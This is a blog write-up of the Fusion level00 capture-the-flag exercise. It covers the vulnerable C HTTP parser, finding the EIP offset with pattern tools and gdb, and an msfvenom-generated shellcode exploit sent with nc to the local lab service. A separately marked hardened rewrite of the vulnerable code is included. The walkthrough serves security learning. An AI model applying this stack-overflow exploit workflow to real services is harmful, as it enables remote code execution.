Fusion level00

Published: 2025-01-20 Author: 千家信息网 editor
Last updated: 2025-01-20

After a bit more than half a month I finished Protostar, rested a few days, and now continue with Fusion.

********* Digression begins **********

Back in university I went back and forth on whether to go down the programmer path, and eventually gave it up because long stretches of intense coding made me unwell. Still, I have to praise that feeling you get when you finally fix a bug. These days, finishing a challenge gives me the same feeling~~~~

********* Digression ends **********

level00 source:

    #include "../common/common.c"

    int fix_path(char *path)
    {
        char resolved[128];   /* realpath() may write up to PATH_MAX bytes here: this is the overflow */

        if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
        strcpy(path, resolved);   /* copies the (possibly long) canonical path back over the request buffer */
        return 0;
    }

    char *parse_http_request()
    {
        char buffer[1024];
        char *path;
        char *q;

        printf("[debug] buffer is at 0x%08x :-)\n", buffer);   /* leaks the stack address used below */

        if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
        if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

        path = &buffer[4];
        q = strchr(path, ' ');
        if(! q) errx(0, "No protocol version specified");
        *q++ = 0;
        if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

        fix_path(path);
        printf("trying to access %s\n", path);

        return path;
    }

    int main(int argc, char **argv, char **envp)
    {
        int fd;
        char *p;

        background_process(NAME, UID, GID);
        fd = serve_forever(PORT);
        set_io(fd);
        parse_http_request();
    }

Fusion's challenges are the advanced continuation of Protostar and are harder; level00, of course, is still a warm-up. From the challenge hint we know this is a stack problem, and that the shellcode should be placed outside resolved.
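The hint points at the root cause: realpath() may write up to PATH_MAX bytes into the 128-byte resolved array, and strcpy() then copies that result back over the request buffer, while read() never NUL-terminates buffer before strchr() scans it. As an added example (not code from the challenge or its author), here is a hardened rewrite of both routines; the names fix_path_safe and parse_request_path and their return codes are hypothetical:

```c
#define _XOPEN_SOURCE 700   /* declares realpath() in stdlib.h */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical hardened replacement for the level's fix_path() (added here,
 * not part of the challenge). realpath(path, NULL) makes libc allocate a
 * PATH_MAX-sized result instead of writing into a 128-byte stack array, and
 * the canonical path is copied back only if it fits the caller's buffer.
 * Returns 0 on success, 1 if the path cannot be resolved, 2 if it is too long. */
int fix_path_safe(char *path, size_t path_size)
{
    char *resolved = realpath(path, NULL);
    if (resolved == NULL)
        return 1;
    size_t len = strlen(resolved);
    if (len + 1 > path_size) {
        free(resolved);
        return 2;
    }
    memcpy(path, resolved, len + 1);
    free(resolved);
    return 0;
}

/* Hardened counterpart of parse_http_request(): every scan is bounded by the
 * number of bytes actually read (read() does not NUL-terminate), and the path
 * is copied into a caller-owned buffer of known size before canonicalising.
 * Returns 0 on success, 10-13 for a malformed request, else fix_path_safe()'s code. */
int parse_request_path(const char *req, size_t n, char *out, size_t out_size)
{
    if (n < 4 || memcmp(req, "GET ", 4) != 0)
        return 10;                              /* not a GET request */
    const char *path = req + 4;
    const char *end = memchr(path, ' ', n - 4); /* bounded, unlike strchr() */
    if (end == NULL)
        return 11;                              /* no protocol version */
    size_t plen = (size_t)(end - path);
    if (plen + 1 > out_size)
        return 12;                              /* path would not fit */
    const char *ver = end + 1;
    if ((size_t)(ver - req) + 8 > n || memcmp(ver, "HTTP/1.1", 8) != 0)
        return 13;                              /* invalid protocol */
    memcpy(out, path, plen);
    out[plen] = '\0';
    return fix_path_safe(out, out_size);
}
```

A request such as "GET /./ HTTP/1.1" resolves to "/", while a path longer than the output buffer is rejected with code 12 instead of being copied.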


Since it is a stack problem, let's feed it a longer string.

    fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_create.rb 150
    Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
    fusion@fusion:~$ python -c "print 'GET /'+'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9' + ' HTTP/1.1'" | nc localhost 20000
    [debug] buffer is at 0xbf89b338 :-)

######################################################################
#  To change where core files are written:                           #
#  sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern'  #
######################################################################

Inspect the core file with gdb:

    fusion@fusion:/tmp$ sudo -s gdb --quiet --core=core.1368248639
    [sudo] password for fusion:
    [New LWP 2495]
    Core was generated by `./level00'.
    Program terminated with signal 11, Segmentation fault.
    #0  0x65413665 in ?? ()
    (gdb)

Using the pattern_offset.rb tool:

    fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_offset.rb 0x65413665
    139

So the overflowing characters overwrite EIP at offset 139.

Next, the shellcode needs to go into the input, and the core file tells us where it lands.

    fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\xef\xbe\xad\xde' + ' HTTP/1.1' + '\x90'*100 + 'a'*100 " | nc localhost 20000
    [debug] buffer is at 0xbf89b338 :-)

***************

    fusion@fusion:/tmp$ sudo -s gdb --core=core.1368255737
    GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
    Copyright (C) 2011 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
    and "show warranty" for details.
    This GDB was configured as "i686-linux-gnu".
    For bug reporting instructions, please see:
    .
    [New LWP 2833]
    Core was generated by `./level00'.
    Program terminated with signal 11, Segmentation fault.
    #0  0xdeadbeef in ?? ()
    (gdb) x/200x 0xbf89b340
    0xbf89b340:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b350:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b360:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b370:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b380:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b390:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b3a0:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b3b0:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b3c0:     0x61616161      0x61616161      0xdeadbeef      0x54544800
    0xbf89b3d0:     0x2e312f50      0x90909031      0x90909090      0x90909090
    0xbf89b3e0:     0x90909090      0x90909090      0x90909090      0x90909090
    0xbf89b3f0:     0x90909090      0x90909090      0x90909090      0x90909090
    0xbf89b400:     0x90909090      0x90909090      0x90909090      0x90909090
    0xbf89b410:     0x90909090      0x90909090      0x90909090      0x90909090
    0xbf89b420:     0x90909090      0x90909090      0x90909090      0x90909090
    0xbf89b430:     0x90909090      0x90909090      0x61616190      0x61616161
    0xbf89b440:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b450:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b460:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b470:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b480:     0x61616161      0x61616161      0x61616161      0x61616161
    0xbf89b490:     0x0a616161      0x00000004      0xb77bc6e0      0x00000000


From this we can see that the part of the string we wrote after the protocol version starts at 0xbf89b3d5. As before, some 0x90 padding goes in front of the shellcode. So the payload format should look like this:

GET /AAA……AA\x00\xb4\x89\xbf HTTP/1.10x90……0x90[SHELLCODE]

First, get a shellcode:

    fusion@fusion:/opt/metasploit-framework$ sudo -s ./msfvenom -p linux/x86/exec -f pl CMD="touch /tmp/fusion_for_zsz"
    [sudo] password for fusion:
    my $buf =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" .
    "\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00" .
    "\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75" .
    "\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57" .
    "\x53\x89\xe1\xcd\x80";


And so:

    fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\x10\xb4\x89\xbf' + ' HTTP/1.1' + '\x90'*100 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57\x53\x89\xe1\xcd\x80' " | nc localhost 20000
    [debug] buffer is at 0xbf89b338 :-)
    fusion@fusion:/tmp$ ll
    total 912
    drwxrwxrwt 4 root  root     340 2013-05-11 17:30 ./
    drwxr-xr-x 1 root  root     240 2013-05-11 22:50 ../
    -rw------- 1 root  20000 196608 2013-05-11 15:03 core.1368248639
    -rw------- 1 root  20000 196608 2013-05-11 15:33 core.1368250392
    -rw------- 1 root  20000 196608 2013-05-11 15:36 core.1368250571
    -rw------- 1 root  20000 196608 2013-05-11 15:41 core.1368250870
    -rw------- 1 root  20000 196608 2013-05-11 15:46 core.1368251166
    -rw------- 1 root  20000 196608 2013-05-11 15:51 core.1368251470
    -rw------- 1 root  20000 196608 2013-05-11 16:02 core.1368252121
    -rw------- 1 root  20000 196608 2013-05-11 17:02 core.1368255737
    -rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256578
    -rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256609
    -rw------- 1 root  20000 196608 2013-05-11 17:19 core.1368256755
    -rw------- 1 root  20000 196608 2013-05-11 17:24 core.1368257093
    -rw-r--r-- 1 20000 20000      0 2013-05-11 17:30 fusion_for_zsz
    drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .ICE-unix/
    drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .X11-unix/
